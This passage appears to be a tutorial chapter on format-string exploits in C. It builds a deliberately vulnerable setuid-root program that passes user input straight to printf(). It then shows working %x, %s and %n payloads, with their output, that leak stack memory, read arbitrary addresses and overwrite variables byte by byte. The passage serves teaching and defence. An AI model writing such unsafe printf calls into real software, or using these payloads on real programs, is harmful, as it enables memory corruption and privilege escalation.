Format-string exploits are a relatively new class of exploit. Like buffer-overflow exploits, the ultimate goal of a format-string exploit is to overwrite data in order to control the execution flow of a privileged program. Format-string exploits also depend on programming mistakes that may not appear to have an obvious impact on security. Luckily for programmers, once the technique is known, it's fairly easy to spot format-string vulnerabilities and eliminate them. But first some background on format strings is needed.
Format strings are used by format functions, like printf(). These functions take a format string as the first argument, followed by a variable number of arguments that depend on the format string. The printf() function has been used extensively in the previous pieces of code. Here's one example from the last program:
printf("You picked: %d\n", user_pick);
Here the format string is "You picked: %d\n". The printf() function prints the format string, but it performs a special operation when a format parameter like %d is encountered. This parameter is used to print the next argument of the function as a decimal integer value. The following table lists some other similar format parameters:
Parameter | Output Type
---|---
%d | Decimal
%u | Unsigned decimal
%x | Hexadecimal
All of the preceding format parameters get their data as values, not pointers to values. There are also some format parameters that expect pointers, such as the following:
Parameter | Output Type
---|---
%s | String
%n | Number of bytes written so far
The %s format parameter expects to be given a memory address and prints the data at that memory address until a null byte is encountered. The %n format parameter is special, in that it actually writes data. It also expects to be given a memory address and writes the number of bytes that have been written so far into that memory address.
A format function, such as printf(), simply evaluates the format string passed to it and performs a special action each time a format parameter is encountered. Each format parameter expects an additional variable to be passed, so if there are three format parameters in a format string, there should be three additional arguments to the function (in addition to the format-string argument). Some example code should help clarify things.
#include <stdio.h>
#include <stdlib.h>   // for exit()

int main() {
   char string[7] = "sample";
   int A = -72;
   unsigned int B = 31337;
   int count_one, count_two;

   // Example of printing with different format string
   printf("[A] Dec: %d, Hex: %x, Unsigned: %u\n", A, A, A);
   printf("[B] Dec: %d, Hex: %x, Unsigned: %u\n", B, B, B);
   printf("[field width on B] 3: '%3u', 10: '%10u', '%08u'\n", B, B, B);
   printf("[string] %s Address %08x\n", string, string);

   // Example of unary address operator and a %x format string
   printf("count_one is located at: %08x\n", &count_one);
   printf("count_two is located at: %08x\n", &count_two);

   // Example of a %n format string
   printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two);
   printf("count_one: %d\n", count_one);
   printf("count_two: %d\n", count_two);

   // Stack Example
   printf("A is %d and is at %08x. B is %u and is at %08x.\n", A, &A, B, &B);

   exit(0);
}
The following is the output of the program's compilation and execution.
$ gcc -o fmt_example fmt_example.c
$ ./fmt_example
[A] Dec: -72, Hex: ffffffb8, Unsigned: 4294967224
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '     31337', '00031337'
[string] sample Address bffff960
count_one is located at: bffff964
count_two is located at: bffff960
The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is -72 and is at bffff95c. B is 31337 and is at bffff958.
$
The first two printf() statements demonstrate the printing of variables A and B, using different format parameters. Because there are three format parameters in each line, the variables A and B need to be supplied three times each. The %d format parameter allows for negative values, while %u does not, because it is expecting unsigned values.
A is outputted as a very high value when %u is used, because the negative value is stored using two's complement, but displayed as an unsigned value. Two's complement is the way negative numbers are stored on computers. The idea behind two's complement is to provide a binary representation of a number that when added to a positive number of the same magnitude will produce zero. This is done by first writing the positive number in binary, then flipping all the bits, and finally adding one. This can be quickly explored and validated with a hexadecimal and binary calculator, such as pcalc.
$ pcalc 72
        72              0x48            0y1001000
$ pcalc 0y0000000001001000
        72              0x48            0y1001000
$ pcalc 0y1111111110110111
        65463           0xffb7          0y1111111110110111
$ pcalc 0y1111111110110111 + 1
        65464           0xffb8          0y1111111110111000
$
This pcalc example shows that the last 2 bytes of the two's complement representation for -72 should be 0xffb8, which matches the hexadecimal output of A.
The third line in the example, labeled [field width on B], shows the use of the field width option in a format parameter. This is just an integer number that designates the minimum field width for that format parameter. However, this is not a maximum field width: If the value to be outputted is greater than the field width, the field width will be exceeded. This happens when 3 is used, because the output data needs 5 bytes. When 10 is used as the field width, 5 bytes of blank space are outputted before the output data. Additionally, if a field width value begins with a zero, this means the field should be padded with zeros. When 08 is used, for example, the output is 00031337.
The fourth line, labeled [string], simply shows the use of the %s format parameter. The variable string is actually a pointer containing the address of the string, which works out wonderfully, because the %s format parameter expects its data to be passed by reference.
As these examples show, you should use %d for decimal, %u for unsigned, and %x for hexadecimal values. Minimum field widths can be set by putting a number right after the percent sign, and if the field width begins with 0, it will be padded with zeros. The %s parameter can be used to print strings and should be passed the address of the string. So far, so good.
The next part of the example demonstrates the use of the unary address operator. In C, any variable prepended with an ampersand will return the address of that variable. Here's that section of the fmt_example.c code:
// Example of unary address operator and a %x format string
printf("count_one is located at: %08x\n", &count_one);
printf("count_two is located at: %08x\n", &count_two);
The next piece of the fmt_example.c code demonstrates the use of the %n format parameter. The %n format parameter is different from all other format parameters, in that it writes data without displaying anything, as opposed to reading and then displaying data. When a format function encounters a %n format parameter, it writes the number of bytes that the function has output so far to the address in the corresponding function argument. In fmt_example, this is done at two places, and the unary address operator is used to write this data into the variables count_one and count_two, respectively. The values are then outputted, revealing that 46 bytes are found before the first %n, and 113 before the second.
Finally, the stack example provides a convenient segue into an explanation of the stack's role with format strings:
printf("A is %d and is at %08x. B is %u and is at %08x.\n", A, &A, B, &B);
When this printf() function is called (as with any function), the arguments are pushed to the stack in reverse order. First the address of B is pushed, then the value of B, then the address of A, then the value of A, and finally the address of the format string. From the top of the stack downward, the stack then holds the address of the format string, the value of A, the address of A, the value of B, and the address of B.
The format function iterates through the format string one character at a time. If the character isn't the beginning of a format parameter (which is designated by the percent sign), the character is copied to the output. If a format parameter is encountered, the appropriate action is taken, using the argument in the stack corresponding to that parameter.
But what if only three arguments are pushed to the stack with a format string that uses four format parameters? Try changing the printf() line in the stack example to this:
printf("A is %d and is at %08x. B is %u and is at %08x.\n", A, &A, B);
This can be done in an editor or with a little bit of sed magic.
$ sed -e 's/B, &B)/B)/' fmt_example.c > fmt_example2.c
$ gcc -o fmt_example fmt_example2.c
$ ./fmt_example
[A] Dec: -72, Hex: ffffffb8, Unsigned: 4294967224
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '     31337', '00031337'
[string] sample Address bffff970
count_one is located at: bffff964
count_two is located at: bffff960
The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is -72 and is at bffff96c. B is 31337 and is at 00000071.
$
The result is 00000071. What the hell is 00000071? It turns out that because there wasn't a value pushed to the stack, the format function just pulled data from where the fourth argument should have been (by adding to the current frame pointer). This means 0x00000071 is the first value found below the stack frame for the format function.
This is definitely an interesting detail that should be remembered. It certainly would be a lot more useful if there were a way to control either the number of arguments passed to or expected by a format function. Luckily, there is a fairly common programming mistake that allows for the latter.
Sometimes programmers print strings using printf(string), instead of printf("%s", string). Functionally, this works fine. The format function is passed the address of the string, as opposed to the address of a format string, and it iterates through the string, printing each character. Both methods are shown in the following example.
#include <stdio.h>    // for printf()
#include <stdlib.h>   // for exit()
#include <string.h>   // for strcpy()
int main(int argc, char *argv[]) {
   char text[1024];
   static int test_val = -72;

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way:\n");
   // The right way to print user-controlled input:
   printf("%s", text);
   // ---------------------------------------------

   printf("\nThe wrong way:\n");
   // The wrong way to print user-controlled input:
   printf(text);
   // ---------------------------------------------

   printf("\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);

   exit(0);
}
The following output shows the compilation and execution of fmt_vuln.
$ gcc -o fmt_vuln fmt_vuln.c
$ sudo chown root.root fmt_vuln
$ sudo chmod u+s fmt_vuln
$ ./fmt_vuln testing
The right way:
testing
The wrong way:
testing
[*] test_val @ 0x08049570 = -72 0xffffffb8
$
Both methods seem to work fine with the string testing. But what happens if the string contains a format parameter? The format function should try to evaluate the format parameter and access the appropriate function argument by adding to the frame pointer. But as we saw earlier, if the appropriate function argument isn't there, adding to the frame pointer will reference a piece of memory in a preceding stack frame.
$ ./fmt_vuln testing%x
The right way:
testing%x
The wrong way:
testingbffff5a0
[*] test_val @ 0x08049570 = -72 0xffffffb8
$
When the %x format parameter was used, the hexadecimal representation of a 4-byte word in the stack was printed. This process can be used repeatedly to examine stack memory.
$ ./fmt_vuln `perl -e 'print "%08x."x40;'`
The right way:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way:
bffff4e0.000003e8.000003e8.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
[*] test_val @ 0x08049570 = -72 0xffffffb8
$
So this is what the lower stack memory looks like. Remember that each 4-byte word is backward, due to the little-endian architecture. The bytes 0x25, 0x30, 0x38, 0x78, and 0x2e seem to be repeating a lot. Wonder what those bytes are.
$ printf "\x25\x30\x38\x78\x2e\n"
%08x.
$
As you can see, it's the memory for the format string itself. Because the format function will always be on the highest stack frame, as long as the format string has been stored anywhere on the stack, it will be located below the current frame pointer (at a higher memory address). This fact can be used to control arguments to the format function. It is particularly useful if format parameters that pass by reference are used, such as %s or %n.
The %s format parameter can be used to read from arbitrary memory addresses. Because it's possible to read the data of the original format string, part of the original format string can be used to supply an address to the %s format parameter, as shown here:
$ ./fmt_vuln AAAA%08x.%08x.%08x.%08x
The right way:
AAAA%08x.%08x.%08x.%08x
The wrong way:
AAAAbffff590.000003e8.000003e8.41414141
[*] test_val @ 0x08049570 = -72 0xffffffb8
$
The four bytes of 0x41 indicate that the fourth format parameter is reading from the beginning of the format string to get its data. If the fourth format parameter is %s instead of %x, the format function will attempt to print the string located at 0x41414141. This will cause the program to crash in a segmentation fault, because this isn't a valid address. But if a valid memory address is used, this process could be used to read a string found at that memory address.
$ ./getenvaddr PATH
PATH is located at 0xbffffd10
$ pcalc 0x10 + 4
        20              0x14            0y10100
$ ./fmt_vuln `printf "\x14\xfd\xff\xbf"`%08x.%08x.%08x%s
The right way:
yáÿ¿%08x.%08x.%08x%s
The wrong way:
yáÿ¿bffff480.00000065.00000000/bin:/usr/bin:/usr/local/bin:/opt/bin:/usr/X11R6/bin:/usr/games/bin:/opt/insight/bin:.:/sbin:/usr/sbin:/usr/local/sbin:/home/matrix/bin
[*] test_val @ 0x08049570 = -72 0xffffffb8
$
$ ./fmt_vuln `printf "\x14\xfd\xff\xbf"`%x.%x.%x%s
The right way:
yáÿ¿%x.%x.%x%s
The wrong way:
yáÿ¿bffff490.65.0/bin:/usr/bin:/usr/local/bin:/opt/bin:/usr/X11R6/bin:/usr/games/bin:/opt/insight/bin:.:/sbin:/usr/sbin:/usr/local/sbin:/home/matrix/bin
[*] test_val @ 0x08049570 = -72 0xffffffb8
Here the getenvaddr program is used to get the address of the environment variable PATH. Because the program name fmt_vuln is two bytes shorter than getenvaddr, 4 is added to the address, and the bytes of the address are supplied in reverse order because of the little-endian byte ordering. The fourth format parameter of %s reads from the beginning of the format string, thinking it's the address that was passed as a function argument. Because this address is the address of the PATH environment variable, it is printed as if a pointer to the environment variable were passed to printf().
Now that the distance between the end of the stack frame and the beginning of the format-string memory is known, the field width arguments can be omitted in the %x format parameters. These format parameters are only needed to step through memory. Using this technique, any memory address can be examined as a string.
If the %s format parameter can be used to read an arbitrary memory address, the same technique using %n should be able to write to an arbitrary memory address. Now things are getting interesting.
The test_val variable has been printing its address and value in the debug statement of the vulnerable fmt_vuln program, just begging to be overwritten. The test variable is located at 0x08049570, so by using a similar technique as before, you should be able to write to the variable.
$ ./fmt_vuln `printf "\x70\x95\x04\x08"`%x.%x.%x%n
The right way:
%x.%x.%x%n
The wrong way:
bffff5a0.3e8.3e8
[*] test_val @ 0x08049570 = 20 0x00000014
$ ./fmt_vuln `printf "\x70\x95\x04\x08"`%08x.%08x.%08x%n
The right way:
%08x.%08x.%08x%n
The wrong way:
bffff590.000003e8.000003e8
[*] test_val @ 0x08049570 = 30 0x0000001e
$
As this shows, the test_val variable can indeed be overwritten using the %n format parameter. The resulting value in the test variable depends on the number of bytes written before the %n. This can be controlled to a greater degree by manipulating the field width option.
$ ./fmt_vuln `printf "\x70\x95\x04\x08"`%x.%x.%100x%n
The right way:
%x.%x.%100x%n
The wrong way:
bffff5a0.3e8. 3e8
[*] test_val @ 0x08049570 = 117 0x00000075
$ ./fmt_vuln `printf "\x70\x95\x04\x08"`%x.%x.%183x%n
The right way:
%x.%x.%183x%n
The wrong way:
bffff5a0.3e8. 3e8
[*] test_val @ 0x08049570 = 200 0x000000c8
$ ./fmt_vuln `printf "\x70\x95\x04\x08"`%x.%x.%238x%n
The right way:
%x.%x.%238x%n
The wrong way:
bffff5a0.3e8. 3e8
[*] test_val @ 0x08049570 = 255 0x000000ff
$
By manipulating the field width option of one of the format parameters before the %n, a certain number of blank spaces can be inserted, resulting in the output having some blank lines, which, in turn, can be used to control the number of bytes written before the %n format parameter. This approach will work fine for small numbers, but it won't work for larger numbers, like memory addresses.
Looking at the hexadecimal representation of the test_val value, it's apparent that the least significant byte can be controlled fairly well. Remember that the least significant byte is actually located in the first byte of the 4-byte word of memory. This detail can be used to write an entire address. If four writes are done at sequential memory addresses, the least significant byte can be written to each byte of a 4-byte word, as shown here:
Memory | XX XX XX XX | Address
---|---|---
First write | AA 00 00 00 | 0x08049570
Second write | BB 00 00 00 | 0x08049571
Third write | CC 00 00 00 | 0x08049572
Fourth write | DD 00 00 00 | 0x08049573
Result | AA BB CC DD |
As an example, let's try to write the address 0xDDCCBBAA into the test variable. In memory, the first byte of the test variable should be 0xAA, then 0xBB, then 0xCC, and finally 0xDD. Four separate writes to the memory addresses 0x08049570, 0x08049571, 0x08049572, and 0x08049573 should accomplish this. The first write will write the value 0x000000aa, the second 0x000000bb, the third 0x000000cc, and finally 0x000000dd.
The first write should be easy.
$ ./fmt_vuln `printf "\x70\x95\x04\x08"`%x.%x.%x%n
The right way:
%x.%x.%x%n
The wrong way:
bffff5a0.3e8.3e8
[*] test_val @ 0x08049570 = 20 0x00000014
$ pcalc 20 - 3
        17              0x11            0y10001
$ pcalc 0xaa - 17
        153             0x99            0y10011001
$ ./fmt_vuln `printf "\x70\x95\x04\x08"`%x.%x.%153x%n
The right way:
%x.%x.%153x%n
The wrong way:
bffff5a0.3e8. 3e8
[*] test_val @ 0x08049570 = 170 0x000000aa
$
The first byte should be 0xAA, and the last %x format parameter outputs 3 bytes of 3e8. Because 20 was written into the test variable, basic math can be used to deduce that the format parameters before that had written 17 bytes. In order to get the least significant byte to equal 0xAA, the last %x format parameter must be made to output 153 bytes instead of just 3. The field width parameter can make this adjustment quite nicely.
Now for the next write. Another argument is needed for another %x format parameter to increment the byte count up to 187, which is the decimal value of 0xBB. This argument could be anything; it just has to be four bytes long and must be located after the first arbitrary memory address of 0x08049570. Because this is all still in the memory of the format string, it can be easily controlled. The word "JUNK" is four bytes long and will work fine.
After that, the next memory address to be written to, 0x08049571, should be put into memory so the second %n format parameter can access it. This means the beginning of the format string should consist of the target memory address, four bytes of junk, and then the target memory address plus one. But all of these bytes of memory are also printed out by the format function, thus incrementing the byte counter used for the %n format parameter. This is getting tricky.
Perhaps the beginning of the format string should be thought about ahead of time. The end goal is to have four writes. Each one will need to have a memory address passed to it, and between them all, four bytes of junk are needed to properly increment the byte counter for the %n format parameters. The first %x format parameter can use the four bytes found before the format string itself, but the remaining three will need to be supplied data. So, for the entire write procedure, the beginning of the format string should consist of the four target addresses separated by 4-byte junk words: 0x08049570, JUNK, 0x08049571, JUNK, 0x08049572, JUNK, and 0x08049573.
Let's give it a try.
$ ./fmt_vuln `printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"`%x.%x.%x%n
The right way:
JUNKJUNKJUNK%x.%x.%x%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8.3e8
[*] test_val @ 0x08049570 = 44 0x0000002c
$ pcalc 44 - 3
        41              0x29            0y101001
$ pcalc 0xaa - 41
        129             0x81            0y10000001
$ ./fmt_vuln `printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"`%x.%x.%129x%n
The right way:
JUNKJUNKJUNK%x.%x.%129x%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8. 3e8
[*] test_val @ 0x08049570 = 170 0x000000aa
$
The addresses and junk data at the beginning of the format string changed the value of the necessary field width option for the %x format parameter. However, this is easily recalculated using the same method as before. Another way this could have been done is to subtract 24 from the previous field width value of 153, because six new 4-byte words have been added to the front of the format string.
Now that all the memory is set up ahead of time in the beginning of the format string, the second write should be simple.
$ pcalc 0xbb - 0xaa
        17              0x11            0y10001
$ ./fmt_vuln `printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"`%x.%x.%129x%n%17x%n
The right way:
JUNKJUNKJUNK%x.%x.%129x%n%17x%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8. 3e8 4b4e554a
[*] test_val @ 0x08049570 = 48042 0x0000bbaa
$
The next desired value for the least significant byte is 0xBB. A hexadecimal calculator quickly shows that 17 more bytes need to be written before the next %n format parameter. Because memory has already been set up for a %x format parameter, it's simple to write 17 bytes using the field width option.
This process can be repeated for the third and fourth writes.
$ pcalc 0xcc - 0xbb
        17              0x11            0y10001
$ ./fmt_vuln `printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"`%x.%x.%129x%n%17x%n%17x%n
The right way:
JUNKJUNKJUNK%x.%x.%129x%n%17x%n%17x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8. 3e8 4b4e554a 4b4e554a
[*] test_val @ 0x08049570 = 13417386 0x00ccbbaa
$ pcalc 0xdd - 0xcc
        17              0x11            0y10001
$ ./fmt_vuln `printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"`%x.%x.%129x%n%17x%n%17x%n%17x%n
The right way:
JUNKJUNKJUNK%x.%x.%129x%n%17x%n%17x%n%17x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8. 3e8 4b4e554a 4b4e554a 4b4e554a
[*] test_val @ 0x08049570 = -573785174 0xddccbbaa
$
By controlling the least significant byte and performing four writes, an entire address can be written to any memory address. It should be noted that the three bytes found after the target address will also get overwritten using this technique. This can be quickly explored by statically declaring another initialized variable called next_val, right after test_val, and also displaying this value in the debug output. The changes can be made in an editor or with some more sed magic.
Here, next_val is initialized with the value 0x11111111, so the effect of the write operations on it will be apparent.
$ sed -e 's/72;/72, next_val = 0x11111111;/;/@/{h;s/test/next/g;x;G}' fmt_vuln.c > fmt_vuln2.c
$ diff fmt_vuln.c fmt_vuln2.c
6c6
< static int test_val = -72;
---
> static int test_val = -72, next_val = 0x11111111;
27a28
> printf("[*] next_val @ 0x%08x = %d 0x%08x\n", &next_val, next_val, next_val);
$ gcc -o fmt_vuln2 fmt_vuln2.c
$ ./fmt_vuln2 test
The right way:
test
The wrong way:
test
[*] test_val @ 0x080495d0 = -72 0xffffffb8
[*] next_val @ 0x080495d4 = 286331153 0x11111111
As the preceding output shows, the code change has also moved the address of the test_val variable. However, next_val is shown to be adjacent to it. It should be good practice to write an address into the variable test_val again, using the new address.
Last time, a very convenient address of 0xddccbbaa was used. Because each byte is greater than the previous byte, it's easy to increment the byte counter for each byte. But what if an address like 0x0806abcd is used? With this address, 205 bytes must first be outputted in order to write the first byte of 0xCD using the %n format parameter. But then the next byte to be written is 0xAB, which would need to have 171 bytes outputted. It's easy to increment the byte counter for the %n format parameter, but it's impossible to subtract from it. So, instead of trying to subtract 34 from 205, the least significant byte is just wrapped around to 0x1AB by adding 222 to 205 to produce 427, which is the decimal representation of 0x1AB. This technique can be used to wrap around again to set the least significant byte to 0x06 for the third write.
$ ./fmt_vuln2 AAAA%x.%x.%x.%x
The right way:
AAAA%x.%x.%x.%x
The wrong way:
AAAAbffff5a0.3e8.3e8.41414141
[*] test_val @ 0x080495d0 = -72 0xffffffb8
[*] next_val @ 0x080495d4 = 286331153 0x11111111
$ ./fmt_vuln2 `printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"`%x.%x.%x.%n
The right way:
JUNKJUNKJUNK%x.%x.%x.%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8.3e8.
[*] test_val @ 0x080495d0 = 45 0x0000002d
[*] next_val @ 0x080495d4 = 286331153 0x11111111
$ pcalc 45 - 3
        42              0x2a            0y101010
$ pcalc 0xcd - 42
        163             0xa3            0y10100011
$ ./fmt_vuln2 `printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"`%x.%x.%163x.%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8. 3e8.
[*] test_val @ 0x080495d0 = 205 0x000000cd
[*] next_val @ 0x080495d4 = 286331153 0x11111111
$
$ pcalc 0xab - 0xcd
        -34             0xffffffde      0y11111111111111111111111111011110
$ pcalc 0x1ab - 0xcd
        222             0xde            0y11011110
$ ./fmt_vuln2 `printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"`%x.%x.%163x.%n%222x%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n%222x%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8. 3e8. 4b4e554a
[*] test_val @ 0x080495d0 = 109517 0x0001abcd
[*] next_val @ 0x080495d4 = 286331136 0x11111100
$
$ pcalc 0x06 - 0xab
        -165            0xffffff5b      0y11111111111111111111111101011011
$ pcalc 0x106 - 0xab
        91              0x5b            0y1011011
$ ./fmt_vuln2 `printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"`%x.%x.%163x.%n%222x%n%91x%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n%222x%n%91x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8. 3e8. 4b4e554a 4b4e554a
[*] test_val @ 0x080495d0 = 33991629 0x0206abcd
[*] next_val @ 0x080495d4 = 286326784 0x11110000
$
With each write, bytes of the next_val variable, adjacent to test_val, are being overwritten. The wraparound technique seems to be working fine, but a slight problem manifests itself as the final byte is attempted.
$ pcalc 0x08 - 0x06
        2               0x2             0y10
$ ./fmt_vuln2 `printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"`%x.%x.%163x.%n%222x%n%91x%n%2x%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n%222x%n%91x%n%2x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8. 3e8. 4b4e554a 4b4e554a4b4e554a
[*] test_val @ 0x080495d0 = 235318221 0x0e06abcd
[*] next_val @ 0x080495d4 = 285212674 0x11000002
$
What happened here? The difference between 0x06 and 0x08 is only 2, but 8 bytes are outputted, resulting in the byte 0x0e being written by the %n format parameter instead. This is because the field width option for the %x format parameter is only a minimum field width, and 8 bytes of data were to be outputted. This problem can be alleviated by simply wrapping around again; however, it's good to know the limitations of the field width option.
$ pcalc 0x108 - 0x06
        258             0x102           0y100000010
$ ./fmt_vuln2 `printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"`%x.%x.%163x.%n%222x%n%91x%n%258x%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n%222x%n%91x%n%258x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8. 3e8. 4b4e554a 4b4e554a 4b4e554a
[*] test_val @ 0x080495d0 = 134654925 0x0806abcd
[*] next_val @ 0x080495d4 = 285212675 0x11000003
$
Just like before, the appropriate addresses and junk data are put in the beginning of the format string, and the least significant byte is controlled for four write operations to overwrite all 4 bytes of the variable test_val. Any value subtractions to the least significant byte can be accomplished by wrapping the byte around. Also, any additions less than 8 may need to be wrapped around in a similar fashion.
Direct parameter access is a way to simplify format-string exploits. In the previous exploits, each of the format parameter arguments had to be stepped through sequentially. This necessitated using several %x format parameters to step through parameter arguments until the beginning of the format string was reached. In addition, the sequential nature required three 4-byte words of junk to properly write a full address to an arbitrary memory location.
As the name would imply, direct parameter access allows parameters to be accessed directly by using the dollar sign qualifier. For example, %N$d would access the Nth parameter and display it as a decimal number.
printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
The preceding printf() call would have the following output:
7th: 70, 4th: 00040
First, the 70 is outputted as a decimal number when the format parameter of %7$d is encountered, because the seventh parameter is 70. The second format parameter accesses the fourth parameter and uses a field width option of 05. All of the other parameter arguments are untouched. This method of direct access eliminates the need to step through memory until the beginning of the format string is located, since this memory can be accessed directly. The following output shows the use of direct parameter access.
$ ./fmt_vuln AAAA%x.%x.%x.%x
The right way:
AAAA%x.%x.%x.%x
The wrong way:
AAAAbffff5a0.3e8.3e8.41414141
[*] test_val @ 0x08049570 = -72 0xffffffb8
$ ./fmt_vuln AAAA%4\$x
The right way:
AAAA%4$x
The wrong way:
AAAA41414141
[*] test_val @ 0x08049570 = -72 0xffffffb8
$
In this example, the beginning of the format string is located at the fourth parameter argument. Instead of stepping through the first three parameter arguments using %x format parameters, this memory can be accessed directly. Because this is being done on the command line and the dollar sign is a special character, it must be escaped with a backslash. This just tells the command shell to avoid trying to interpret the dollar sign as a special character. The actual format string can be seen when it is printed the right way.
Direct parameter access also simplifies the writing of memory addresses. Because memory can be accessed directly, there's no need for 4-byte spacers of junk data to increment the byte output count. Each of the %x format parameters that usually perform this function can just directly access a piece of memory found before the format string. For practice, let's try writing a more realistic looking address of 0xbffffd72 into the variable test_val using direct parameter access.
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$x%4\$n
The right way:
%3$x%4$n
The wrong way:
3e8
[*] test_val @ 0x08049570 = 19 0x00000013
$ pcalc 0x72 - 16
98              0x62            0y1100010
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$98x%4\$n
The right way:
%3$98x%4$n
The wrong way:
3e8
[*] test_val @ 0x08049570 = 114 0x00000072
$
$ pcalc 0xfd - 0x72
139             0x8b            0y10001011
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$98x%4\$n%3\$139x%5\$n
The right way:
%3$98x%4$n%3$139x%5$n
The wrong way:
3e8 3e8
[*] test_val @ 0x08049570 = 64882 0x0000fd72
$
$ pcalc 0xff - 0xfd
2               0x2             0y10
$ pcalc 0x1ff - 0xfd
258             0x102           0y100000010
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$98x%4\$n%3\$139x%5\$n%3\$258x%6\$n
The right way:
%3$98x%4$n%3$139x%5$n%3$258x%6$n
The wrong way:
3e8 3e8 3e8
[*] test_val @ 0x08049570 = 33553778 0x01fffd72
$
$ pcalc 0xbf - 0xff
-64             0xffffffc0      0y11111111111111111111111111000000
$ pcalc 0x1bf - 0xff
192             0xc0            0y11000000
$ ./fmt_vuln `printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"`%3\$98x%4\$n%3\$139x%5\$n%3\$258x%6\$n%3\$192x%7\$n
The right way:
%3$98x%4$n%3$139x%5$n%3$258x%6$n%3$192x%7$n
The wrong way:
3e8 3e8 3e8 3e8
[*] test_val @ 0x08049570 = -1073742478 0xbffffd72
$
Using direct parameter access simplifies the process of writing an address and shrinks the mandatory size of the format string.
The ability to overwrite arbitrary memory addresses implies the ability to control the execution flow of the program. One option is to overwrite the return address in the most recent stack frame, as was done with the stack-based overflows. While this is a possible option, there are other targets that have more predictable memory addresses. The nature of stack-based overflows only allows the overwrite of the return address, but format strings provide the ability to overwrite any memory address, which creates other possibilities.
In binary programs compiled with the GNU C compiler, special table sections called .dtors and .ctors are made for destructors and constructors, respectively. Constructor functions are executed before the main function is executed, and destructor functions are executed just before the main function exits with an exit system call. The destructor functions and the .dtors table section are of particular interest.
A function can be declared as a destructor function by defining the destructor attribute, as seen in the following code example.
#include <stdio.h>
#include <stdlib.h>
/* Declare cleanup() as a destructor (a GCC extension). */
static void cleanup(void) __attribute__ ((destructor));
int main(void) {
   printf("Some actions happen in the main() function..\n");
   printf("and then when main() exits, the destructor is called..\n");
   exit(0);
}
/* Called automatically after main() exits. */
void cleanup(void) {
   printf("In the cleanup function now..\n");
}
In the preceding code sample, the cleanup() function is defined with the destructor attribute, so the function is automatically called when the main function exits, as shown next.
$ gcc -o dtors_sample dtors_sample.c
$ ./dtors_sample
Some actions happen in the main() function..
and then when main() exits, the destructor is called..
In the cleanup function now..
$
